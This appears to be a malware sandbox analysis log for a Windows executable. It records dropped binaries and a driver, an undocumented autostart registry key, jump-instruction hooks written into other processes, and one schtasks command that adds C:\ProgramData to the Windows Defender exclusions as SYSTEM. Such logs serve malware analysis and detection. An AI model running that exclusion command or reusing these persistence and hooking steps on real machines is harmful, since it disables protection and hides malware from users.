Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: edgegdi.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: wininet.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: taskschd.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: sxs.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: sspicli.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: xmllite.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: msv1_0.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: ntlmshared.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: cryptdll.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: urlmon.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: iertutil.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: srvcli.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: netutils.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: mswsock.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: napinsp.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: pnrpnsp.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: wshbth.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: nlaapi.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: iphlpapi.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: dnsapi.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: winrnr.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: rasadhlp.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: devenum.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: winmm.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: ntmarta.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: devobj.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: msasn1.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: msdmo.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: avicap32.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: msvfw32.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: edgegdi.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: edgegdi.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: edgegdi.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: edgegdi.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: edgegdi.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: edgegdi.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: edgegdi.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: edgegdi.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: edgegdi.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: edgegdi.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: edgegdi.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: edgegdi.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: tbcore3u.dll
Source: C:\ProgramData\dTuXOGtw.exeSection loaded: apphelp.dll
Source: C:\ProgramData\dTuXOGtw.exeSection loaded: edgegdi.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: edgegdi.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeSection loaded: tbcore3u.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: edgegdi.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: uxtheme.dll
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeSection loaded: tbcore3u.dll
Source: C:\Users\user\Documents\ieiUC1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeFile written: C:\Users\Public\Music\destopbak.iniJump to behavior
Source: 183643586-388657435.07.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: 183643586-388657435.07.exeStatic file information: File size 30948864 > 1048576
Source: 183643586-388657435.07.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1d59800
Source: 183643586-388657435.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 183643586-388657435.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 183643586-388657435.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 183643586-388657435.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 183643586-388657435.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 183643586-388657435.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 183643586-388657435.07.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 183643586-388657435.07.exe
Source: Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: ieiUC1.exe, 00000004.00000003.36961144933.000000000414E000.00000004.00000020.00020000.00000000.sdmp, DXESuT.exe, 00000025.00000000.37225883763.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 00000026.00000002.37248158774.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 00000026.00000000.37242814871.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, I0JA3xg.exe, 00000027.00000000.37248637577.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, I0JA3xg.exe, 00000027.00000002.37255422612.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, I0JA3xg.exe, 0000002A.00000002.37264141184.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, I0JA3xg.exe, 0000002A.00000000.37258425529.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, DXESuT.exe, 0000002B.00000002.37265326143.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 0000002B.00000000.37258903639.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 0000002C.00000002.37350014406.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 0000002C.00000000.37343099366.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, I0JA3xg.exe, 0000002D.00000002.37354481992.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, I0JA3xg.exe, 0000002D.00000000.37348753553.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, DXESuT.exe, 0000002E.00000000.37932804362.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 0000002E.00000002.37938252879.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, I0JA3xg.exe, 0000002F.00000002.37944573090.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, I0JA3xg.exe, 0000002F.00000000.37938712745.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, DXESuT.exe, 00000030.00000000.38532895099.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 00000030.00000002.38538741676.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, I0JA3xg.exe, 00000031.00000002.38544788128.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, I0JA3xg.exe, 00000031.00000000.38538784323.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, DXESuT.exe, 00000032.00000002.39138734072.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 00000032.00000000.39132893557.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, I0JA3xg.exe, 00000033.00000000.39138776659.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, I0JA3xg.exe, 00000033.00000002.39145147808.00000000000F8000.00000002.00000001.01000000.0000000C.sdmp, DXESuT.exe, 00000035.00000000.39732867447.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, DXESuT.exe, 00000035.00000002.39738651568.00000000000A8000.00000002.00000001.01000000.0000000A.sdmp, I0JA3xg.exe, 00000036.00000002.39745875126.00000000000F8000.00000002.00000001.01000000.0000000C.s
Source: Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source: Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: ieiUC1.exe, 00000002.00000002.36318176813.0000000140014000.00000002.00000001.01000000.00000006.sdmp, ieiUC1.exe, 00000002.00000000.36311353866.0000000140014000.00000002.00000001.01000000.00000006.sdmp, ieiUC1.exe, 00000003.00000002.36328287726.0000000140014000.00000002.00000001.01000000.00000006.sdmp, ieiUC1.exe, 00000003.00000000.36320160389.0000000140014000.00000002.00000001.01000000.00000006.sdmp, ieiUC1.exe, 00000004.00000000.36741313443.0000000140014000.00000002.00000001.01000000.00000006.sdmp, ieiUC1.exe.0.dr
Source: 183643586-388657435.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 183643586-388657435.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 183643586-388657435.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 183643586-388657435.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 183643586-388657435.07.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_000000014000F000 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_000000014000F000
Source: initial sampleStatic PE information: section where entry point is pointing to: .mo:
Source: 183643586-388657435.07.exeStatic PE information: section name: _RDATA
Source: tbcore3U.dll.4.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.4.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.4.drStatic PE information: section name: .mo:
Source: tbcore3U.dll.37.drStatic PE information: section name: .%?.
Source: tbcore3U.dll.37.drStatic PE information: section name: .%-[
Source: tbcore3U.dll.37.drStatic PE information: section name: .mo:
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeCode function: 38_2_000A2691 push ecx; ret 38_2_000A26A4
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeCode function: 39_2_000F2691 push ecx; ret 39_2_000F26A4

Persistence and Installation Behavior

barindex
Drops PE files to the document folder of the user
Source: C:\Users\user\Desktop\183643586-388657435.07.exeFile created: C:\Users\user\Documents\ieiUC1.exeJump to dropped file
Source: C:\Users\user\Desktop\183643586-388657435.07.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Sample is not signed and drops a device driver
Source: C:\Users\user\Desktop\183643586-388657435.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to behavior
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeFile created: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeJump to dropped file
Source: C:\Users\user\Documents\ieiUC1.exeFile created: C:\Program Files (x86)\DXESuT\DXESuT.exeJump to dropped file
Source: C:\Users\user\Desktop\183643586-388657435.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeFile created: C:\Program Files (x86)\6IAs1K1O\tbcore3U.dllJump to dropped file
Source: C:\Users\user\Desktop\183643586-388657435.07.exeFile created: C:\Users\user\Documents\ieiUC1.exeJump to dropped file
Source: C:\Users\user\Documents\ieiUC1.exeFile created: C:\Program Files (x86)\DXESuT\tbcore3U.dllJump to dropped file
Source: C:\Users\user\Desktop\183643586-388657435.07.exeFile created: C:\Users\user\Documents\vselog.dllJump to dropped file
Source: C:\Users\user\Desktop\183643586-388657435.07.exeFile created: C:\Windows\System32\drivers\189atohci.sysJump to dropped file

Boot Survival

barindex
Creates an undocumented autostart registry key
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeKey value created or modified: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron Groupfenzhu
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeRegistry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\Sauron
Source: C:\Users\user\Documents\ieiUC1.exeCode function: 2_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,2_2_0000000140001520

Hooking and other Techniques for Hiding and Protection

barindex
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Source: C:\Users\user\Documents\ieiUC1.exeMemory written: PID: 2280 base: 7FFAB4AB0008 value: E9 0B D8 E9 FF Jump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeMemory written: PID: 2280 base: 7FFAB494D810 value: E9 00 28 16 00 Jump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeMemory written: PID: 1836 base: 7FFAB4AB0008 value: E9 0B D8 E9 FF Jump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeMemory written: PID: 1836 base: 7FFAB494D810 value: E9 00 28 16 00 Jump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeMemory written: PID: 1016 base: 7FFAB4AB0008 value: E9 0B D8 E9 FF Jump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeMemory written: PID: 1016 base: 7FFAB494D810 value: E9 00 28 16 00 Jump to behavior
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 2236 base: 15B0005 value: E9 AB 2E 90 76
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 2236 base: 77EB2EB0 value: E9 5A D1 6F 89
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 2236 base: 2D80005 value: E9 AB 2E 13 75
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 2236 base: 77EB2EB0 value: E9 5A D1 EC 8A
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 8008 base: 2900005 value: E9 AB 2E 5B 75
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 8008 base: 77EB2EB0 value: E9 5A D1 A4 8A
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeMemory written: PID: 5880 base: 27E0005 value: E9 AB 2E 6D 75
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeMemory written: PID: 5880 base: 77EB2EB0 value: E9 5A D1 92 8A
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeMemory written: PID: 5152 base: 11A0005 value: E9 AB 2E D1 76
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeMemory written: PID: 5152 base: 77EB2EB0 value: E9 5A D1 2E 89
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 5328 base: E60005 value: E9 AB 2E 05 77
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 5328 base: 77EB2EB0 value: E9 5A D1 FA 88
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 5268 base: 1990005 value: E9 AB 2E 52 76
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 5268 base: 77EB2EB0 value: E9 5A D1 AD 89
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeMemory written: PID: 7500 base: 2B60005 value: E9 AB 2E 35 75
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeMemory written: PID: 7500 base: 77EB2EB0 value: E9 5A D1 CA 8A
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 5704 base: 1410005 value: E9 AB 2E AA 76
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 5704 base: 77EB2EB0 value: E9 5A D1 55 89
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeMemory written: PID: 3124 base: F10005 value: E9 AB 2E FA 76
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeMemory written: PID: 3124 base: 77EB2EB0 value: E9 5A D1 05 89
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 7880 base: F00005 value: E9 AB 2E FB 76
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 7880 base: 77EB2EB0 value: E9 5A D1 04 89
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeMemory written: PID: 808 base: A20005 value: E9 AB 2E 49 77
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeMemory written: PID: 808 base: 77EB2EB0 value: E9 5A D1 B6 88
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 3640 base: 1350005 value: E9 AB 2E B6 76
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 3640 base: 77EB2EB0 value: E9 5A D1 49 89
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeMemory written: PID: 4624 base: 13D0005 value: E9 AB 2E AE 76
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeMemory written: PID: 4624 base: 77EB2EB0 value: E9 5A D1 51 89
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 7272 base: 22A0005 value: E9 AB 2E C1 75
Source: C:\Program Files (x86)\DXESuT\DXESuT.exeMemory written: PID: 7272 base: 77EB2EB0 value: E9 5A D1 3E 8A
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeMemory written: PID: 5328 base: 1400005 value: E9 AB 2E AB 76
Source: C:\Program Files (x86)\6IAs1K1O\I0JA3xg.exeMemory written: PID: 5328 base: 77EB2EB0 value: E9 5A D1 54 89
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Documents\ieiUC1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
